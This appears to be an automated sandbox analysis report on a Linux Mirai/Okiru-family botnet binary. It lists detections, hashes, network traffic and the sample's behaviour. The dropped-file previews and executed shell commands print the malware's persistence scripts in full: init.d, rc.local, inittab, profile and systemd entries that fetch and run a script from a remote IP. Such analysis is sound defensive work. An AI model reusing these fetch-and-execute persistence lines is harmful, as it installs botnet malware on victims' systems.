      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5523/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5600/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5524/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5601/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5525/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5602/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5526/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5603/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5527/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5604/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5528/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5605/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5529/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5606/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5454)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5483)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5485)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5487)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5488)Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5490)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5492)Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"Jump to behavior
      Source: /bin/sh (PID: 5484)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
      Source: /bin/sh (PID: 5489)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/shJump to behavior
      Source: /bin/sh (PID: 5491)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
      Source: /bin/sh (PID: 5466)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5444)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /usr/bin/chmod (PID: 5484)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /usr/bin/chmod (PID: 5489)File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5444)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file
      Source: /tmp/x86_32.nn.elf (PID: 5444)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
      Source: /bin/sh (PID: 5487)Writes shell script file to disk with an unusual file extension: /etc/init.d/shJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: /tmp/x86_32.nn.elf (PID: 5444)File: /etc/init.d/systemJump to dropped file
      Source: /bin/sh (PID: 5487)File: /etc/init.d/shJump to dropped file

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: x86_32.nn.elf, type: SAMPLE
      Source: Yara matchFile source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 5444, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: x86_32.nn.elf, type: SAMPLE
      Source: Yara matchFile source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 5444, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information2
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Unix Shell Configuration Modification
      1
      Unix Shell Configuration Modification
      1
      Masquerading
      1
      OS Credential Dumping
      System Service DiscoveryRemote ServicesData from Local System1
      Non-Standard Port
      Exfiltration Over Other Network Medium1
      Data Manipulation
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Systemd Service
      1
      Systemd Service
      2
      File and Directory Permissions Modification
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt2
      Scripting
      Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580339 Sample: x86_32.nn.elf Startdate: 24/12/2024 Architecture: LINUX Score: 84 51 94.156.227.234, 38242, 44546, 44548 NETIXBG Bulgaria 2->51 53 daisy.ubuntu.com 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 Yara detected Okiru 2->59 61 Machine Learning detection for sample 2->61 8 x86_32.nn.elf 2->8         started        12 udisksd dumpe2fs 2->12         started        14 udisksd dumpe2fs 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 43 /etc/rc.local, POSIX 8->43 dropped 45 /etc/profile, ASCII 8->45 dropped 47 /etc/init.d/system, POSIX 8->47 dropped 63 Sample tries to set files in /etc globally writable 8->63 65 Sample tries to persist itself using /etc/profile 8->65 67 Drops files in suspicious directories 8->67 69 Sample tries to persist itself using System V runlevels 8->69 18 x86_32.nn.elf sh 8->18         started        20 x86_32.nn.elf sh 8->20         started        22 x86_32.nn.elf sh 8->22         started        24 5 other processes 8->24 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        49 /etc/init.d/sh, POSIX 24->49 dropped 71 Drops files in suspicious directories 24->71 35 sh ln 24->35         started        37 sh systemctl 24->37         started        39 sh mkdir 24->39         started        41 x86_32.nn.elf 24->41         started        signatures9 process10 signatures11 73 Sample tries to set files in /etc globally writable 28->73 75 Sample tries to persist itself using System V runlevels 31->75
      SourceDetectionScannerLabelLink
      x86_32.nn.elf21%ReversingLabsLinux.Backdoor.Mirai
      x86_32.nn.elf100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      /etc/init.d/sh3%ReversingLabsText.Browser.Generic
      /etc/init.d/system3%ReversingLabsText.Browser.Generic
      /etc/rc.local0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      daisy.ubuntu.com
      162.213.35.24
      truefalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://94.156.227.233/lol.shx86_32.nn.elf, 5444.1.00000000ffae6000.00000000ffb07000.rw-.sdmpfalse
          high
          http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sx86_32.nn.elffalse
            high
            http://94.156.227.233/x86_32.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.30.dr, bootcmd.12.dr, custom.service.12.drfalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              94.156.227.234
              unknownBulgaria
              57463NETIXBGfalse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              94.156.227.234mipsel.nn.elfGet hashmaliciousOkiruBrowse
                powerpc.nn.elfGet hashmaliciousOkiruBrowse
                  sparc.nn.elfGet hashmaliciousOkiruBrowse
                    arm7.nn-20241224-0652.elfGet hashmaliciousMirai, OkiruBrowse
                      arm.nn-20241224-0652.elfGet hashmaliciousOkiruBrowse
                        mips.nn.elfGet hashmaliciousOkiruBrowse
                          arm5.nn.elfGet hashmaliciousOkiruBrowse
                            sh4.nn.elfGet hashmaliciousOkiruBrowse
                              mips.nn.elfGet hashmaliciousOkiruBrowse
                                x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  daisy.ubuntu.comarm.nn-20241224-0652.elfGet hashmaliciousOkiruBrowse
                                  • 162.213.35.24
                                  x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                  • 162.213.35.25
                                  m68k.nn.elfGet hashmaliciousOkiruBrowse
                                  • 162.213.35.24
                                  x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                  • 162.213.35.25
                                  splarm6.elfGet hashmaliciousUnknownBrowse
                                  • 162.213.35.25
                                  jklarm6.elfGet hashmaliciousUnknownBrowse
                                  • 162.213.35.24
                                  arm.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                  • 162.213.35.24
                                  arm6.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                  • 162.213.35.25
                                  m68k.nn.elfGet hashmaliciousOkiruBrowse
                                  • 162.213.35.25
                                  sh4.nn.elfGet hashmaliciousOkiruBrowse
                                  • 162.213.35.25
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  NETIXBGmipsel.nn.elfGet hashmaliciousOkiruBrowse
                                  • 94.156.227.234
                                  powerpc.nn.elfGet hashmaliciousOkiruBrowse
                                  • 94.156.227.234
                                  sparc.nn.elfGet hashmaliciousOkiruBrowse
                                  • 94.156.227.234
                                  arm7.nn-20241224-0652.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 94.156.227.234
                                  arm.nn-20241224-0652.elfGet hashmaliciousOkiruBrowse
                                  • 94.156.227.234
                                  mips.nn.elfGet hashmaliciousOkiruBrowse
                                  • 94.156.227.234
                                  arm5.nn.elfGet hashmaliciousOkiruBrowse
                                  • 94.156.227.234
                                  sh4.nn.elfGet hashmaliciousOkiruBrowse
                                  • 94.156.227.234
                                  mips.nn.elfGet hashmaliciousOkiruBrowse
                                  • 94.156.227.234
                                  x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                  • 94.156.227.234
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  /etc/init.d/shx86_64.nn.elfGet hashmaliciousOkiruBrowse
                                    x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                      x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                        x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                          x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                            x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                              x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                                  x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                      Process:/tmp/x86_32.nn.elf
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):111
                                                      Entropy (8bit):4.663595298101345
                                                      Encrypted:false
                                                      SSDEEP:3:KPJRK+KFtSyLdjX48FIbILbaaFOdFXa5O:WJ8+KHSYZX48bbaaeXCO
                                                      MD5:3290F4F4E0B77B577C59026DEF246CEE
                                                      SHA1:C51EAE7170430B5697B881BE716280D1FAAA9147
                                                      SHA-256:534E1753E7B5026C5F689F31942BD84E7869232A5CE24AE02B0A9647B3E2EDCD
                                                      SHA-512:DFE561F390A0003C92D0528D418CADA2A84DD4585F838F4A37BDD1790C8B7E947AFD31B527E4F98AD55F49F4168F4574540CCFF2D2EE38BD2A3923DEB9FE6345
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:run bootcmd_mmc0; /bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                      Process:/bin/sh
                                                      File Type:POSIX shell script, ASCII text executable
                                                      Category:dropped
                                                      Size (bytes):355
                                                      Entropy (8bit):4.416220583499086
                                                      Encrypted:false
                                                      SSDEEP:6:h2Rk8d/Kd6Nx/SNAjDTZX48bJaJFCwWBvM1FnwfUMdNfabwHeJdxL/RuYHdSOovl:QRkobNxaNoPUJgjvM1F5KN+dRRucSOyl
                                                      MD5:4C835AF4434E28E5B56D8CDFA8EE753D
                                                      SHA1:B18DA30B2DF68AE4C788540CED328CA545C02F42
                                                      SHA-256:CA0FAC03BB49D9F40E83353A3C85D27B8AD800B8A77F88D1B43025148672E28D
                                                      SHA-512:877B96464C5D6AF38B84F8BE6ECDDA74A9703AA298A897B2EF8DEC9E9B929ECA2E8324979A80033B0E334820B15275E51C1E60EC5A26A7B379A2D8DA5BAC6162
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                      Joe Sandbox View:
                                                      • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                      • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                      • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                      • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                      • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                      • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                      • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                      • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                      • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                      • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                      Reputation:moderate, very likely benign file
                                                      Preview:#!/bin/sh.# /etc/init.d/sh..case "" in. start). echo 'Starting sh'. /bin/sh &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh'. killall sh. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                                      Process:/tmp/x86_32.nn.elf
                                                      File Type:POSIX shell script, ASCII text executable
                                                      Category:dropped
                                                      Size (bytes):98
                                                      Entropy (8bit):4.615605979741142
                                                      Encrypted:false
                                                      SSDEEP:3:TKH4v9+KFyFiLdjX48FIbILpaKB0dFLoKE0:h8KooZX48bzBeLXE0
                                                      MD5:FE7F857A52EC42881A76D01D4A4A1C3C
                                                      SHA1:6391FE715F06AB2D7E58D18A41ED3A358C7E820C
                                                      SHA-256:20B80070DF0EDB6A011753C41051823E2F87C46A5493D6323BB5C023A19D2870
                                                      SHA-512:4AA09F596ACE2DA18FE88DA2224681EAB2A4F77D005E2C67E97E9A0751C387F8DCCD8D1BB05644D75ED2F42959B6EE491D292F80CFEBB5D80EA5F0CE84C47816
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                      Reputation:moderate, very likely benign file
                                                      Preview:#!/bin/sh./bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                                      Process:/tmp/x86_32.nn.elf
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):103
                                                      Entropy (8bit):4.612417623467759
                                                      Encrypted:false
                                                      SSDEEP:3:nAWu5YFtSyLdjX48FIbILbaaFOdFXa5O:A6HSYZX48bbaaeXCO
                                                      MD5:175C6814BBE06EB5816EFE3FE3934230
                                                      SHA1:8C1A49BF7CA134E8AD0DDA70872367062BC600C5
                                                      SHA-256:11CB198833B5FB514AF33682A7148F95AA28CAEA16908A27FA10D71DD272730E
                                                      SHA-512:C1A6BC79D50EEED397A98329E7A2CD7486CBB36F9D3B25AEADA15473D10C31FC2F44D2029F5A174FC813E3BB6B974174850989BF2ADD642F4CD4F1D279B6B1F1
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:::respawn:/bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                      Process:/tmp/x86_32.nn.elf
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):53
                                                      Entropy (8bit):3.871459242626451
                                                      Encrypted:false
                                                      SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                                      MD5:2BD9B4BE30579E633FC0191AA93DF486
                                                      SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                                      SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                                      SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                                      Malicious:false
                                                      Preview:gorilla botnet is on the device ur not a cat go away.
                                                      Process:/tmp/x86_32.nn.elf
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):94
                                                      Entropy (8bit):4.486383977913608
                                                      Encrypted:false
                                                      SSDEEP:3:pKWNFyFiLdjX48FIbILbaaFOdFXa50:kKooZX48bbaaeXC0
                                                      MD5:CEC61C0CDC61AB271C45B85281469388
                                                      SHA1:E2DC08B86AC16A6A9BDA73D26DE0055528C647D9
                                                      SHA-256:AE69256D9ACCEE8C05AFBF46267368A0DDB3E5C9C54D24CFB018A35FEF86C560
                                                      SHA-512:71A65EB5CBBD53E395E8A2B392CB41E289874583C4A17E086498201C6078E5043B680B4971D1913863B2699626F05F63B0936BAFCE9A8F01C6DBAFEE5E93F2A7
                                                      Malicious:true
                                                      Preview:/bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                                      Process:/tmp/x86_32.nn.elf
                                                      File Type:POSIX shell script, ASCII text executable
                                                      Category:dropped
                                                      Size (bytes):10
                                                      Entropy (8bit):3.121928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TKH4vn:hv
                                                      MD5:3E2B31C72181B87149FF995E7202C0E3
                                                      SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                                      SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                                      SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:#!/bin/sh.
                                                      Process:/tmp/x86_32.nn.elf
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):292
                                                      Entropy (8bit):5.064804988275458
                                                      Encrypted:false
                                                      SSDEEP:6:z8ifitRZAMzdK+Gs2+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+y+GWRdtd+GWRXY+GWRuL1I
                                                      MD5:8156A50E9D158639626649BD134E7D5D
                                                      SHA1:D95D108656621F4B4F82B93CA0694D66F4A2FEF4
                                                      SHA-256:FB7F3B6DA55120E08AB0B9A9F4A9ECB1BB5D89BFD665EBE23C150FBFBC06E4D8
                                                      SHA-512:DB79A871E5317E3B9A93FF84E71318F5ABC85EBDE7C9521DF35C20C0AD8251BEB3DB33673BE4F4FF2501256613C50128BA36323C0DECD348FF6CA8A73856BE10
                                                      Malicious:false
                                                      Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/bin/sh.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                                      Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):76
                                                      Entropy (8bit):3.7627880354948586
                                                      Encrypted:false
                                                      SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                      MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                      SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                      SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                      SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                      Malicious:false
                                                      Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                      File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                                      Entropy (8bit):6.482863704273549
                                                      TrID:
                                                      • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                      • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                      File name:x86_32.nn.elf
                                                      File size:79'312 bytes
                                                      MD5:3f1efbfbb79821f4bd17c6a3eff17aa6
                                                      SHA1:a5dfcdc1874352b921f819cd6f39beef6f7b3c79
                                                      SHA256:97cbb9e7d92cfaeb3173bc135b4459d4b91d1b5cb69dd7d61ee830c239545565
                                                      SHA512:7470bd7d9ca66ce7eb9fff610efa3d07aa411020e9e1045e2108079a5cbbde634ee709efa89c64799be09fb37b8936343f7936da3beda22b4fbc3223ec7aa101
                                                      SSDEEP:1536:pozGqITKhN63JFSBFIeRyUpGjiOkAho/swKaIdV/8FjjKQ2BaK3SKs8:GzGq2KhNCJFSBFIeRyU3gokwKaIdZ8V0
                                                      TLSH:27735CC0EA83E9F1EA461175153BA73ACF72F5BD1134EA17DB68A933F942600D61638C
                                                      File Content Preview:.ELF....................d...4...@4......4. ...(.....................<)..<)...............0...............)..........Q.td............................U..S.......w/...h........[]...$.............U......=.....t..5....$......$.......u........t....h<...........

                                                      ELF header

                                                      Class:ELF32
                                                      Data:2's complement, little endian
                                                      Version:1 (current)
                                                      Machine:Intel 80386
                                                      Version Number:0x1
                                                      Type:EXEC (Executable file)
                                                      OS/ABI:UNIX - System V
                                                      ABI Version:0
                                                      Entry Point Address:0x8048164
                                                      Flags:0x0
                                                      ELF Header Size:52
                                                      Program Header Offset:52
                                                      Program Header Size:32
                                                      Number of Program Headers:3
                                                      Section Header Offset:78912
                                                      Section Header Size:40
                                                      Number of Section Headers:10
                                                      Header String Table Index:9
                                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                      NULL0x00x00x00x00x0000
                                                      .initPROGBITS0x80480940x940x1c0x00x6AX001
                                                      .textPROGBITS0x80480b00xb00x102f60x00x6AX0016
                                                      .finiPROGBITS0x80583a60x103a60x170x00x6AX001
                                                      .rodataPROGBITS0x80583c00x103c00x257c0x00x2A0032
                                                      .ctorsPROGBITS0x805b0000x130000x80x00x3WA004
                                                      .dtorsPROGBITS0x805b0080x130080x80x00x3WA004
                                                      .dataPROGBITS0x805b0200x130200x3e00x00x3WA0032
                                                      .bssNOBITS0x805b4000x134000x25e00x00x3WA0032
                                                      .shstrtabSTRTAB0x00x134000x3e0x00x0001
                                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                      LOAD0x00x80480000x80480000x1293c0x1293c6.58490x5R E0x1000.init .text .fini .rodata
                                                      LOAD0x130000x805b0000x805b0000x4000x29e05.33620x6RW 0x1000.ctors .dtors .data .bss
                                                      GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 24, 2024 10:42:48.890645981 CET4454638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:49.010598898 CET382424454694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:49.010701895 CET4454638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:49.010701895 CET4454638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:49.130623102 CET382424454694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:49.560807943 CET4454638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:49.720568895 CET382424454694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:50.137111902 CET382424454694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:50.137274981 CET4454638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:50.565603018 CET4454838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:50.685425997 CET382424454894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:50.685484886 CET4454838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:50.685509920 CET4454838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:50.805109978 CET382424454894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:51.203089952 CET4454838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:51.368701935 CET382424454894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:51.808747053 CET382424454894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:51.808815002 CET4454838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:52.204793930 CET4455038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:52.324412107 CET382424455094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:52.324503899 CET4455038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:52.324503899 CET4455038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:52.445065022 CET382424455094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:52.910372972 CET4455038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:53.076626062 CET382424455094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:53.453605890 CET382424455094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:53.453718901 CET4455038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:53.911396027 CET4455238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:54.031095028 CET382424455294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:54.031188011 CET4455238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:54.031188965 CET4455238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:54.151470900 CET382424455294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:54.535233974 CET4455238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:54.696697950 CET382424455294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:55.162851095 CET382424455294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:55.162915945 CET4455238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:55.536108971 CET4455438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:55.657978058 CET382424455494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:55.658071995 CET4455438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:55.658135891 CET4455438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:55.777621031 CET382424455494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:56.161966085 CET4455438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:56.324630022 CET382424455494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:56.798191071 CET382424455494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:56.798281908 CET4455438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:57.163001060 CET4455638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:57.282567978 CET382424455694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:57.282650948 CET4455638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:57.282691956 CET4455638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:57.402352095 CET382424455694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:57.787094116 CET4455638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:57.952639103 CET382424455694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:58.416060925 CET382424455694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:42:58.416131020 CET4455638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:58.787894964 CET4455838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:42:58.907430887 CET382424455894.156.227.234192.168.2.13
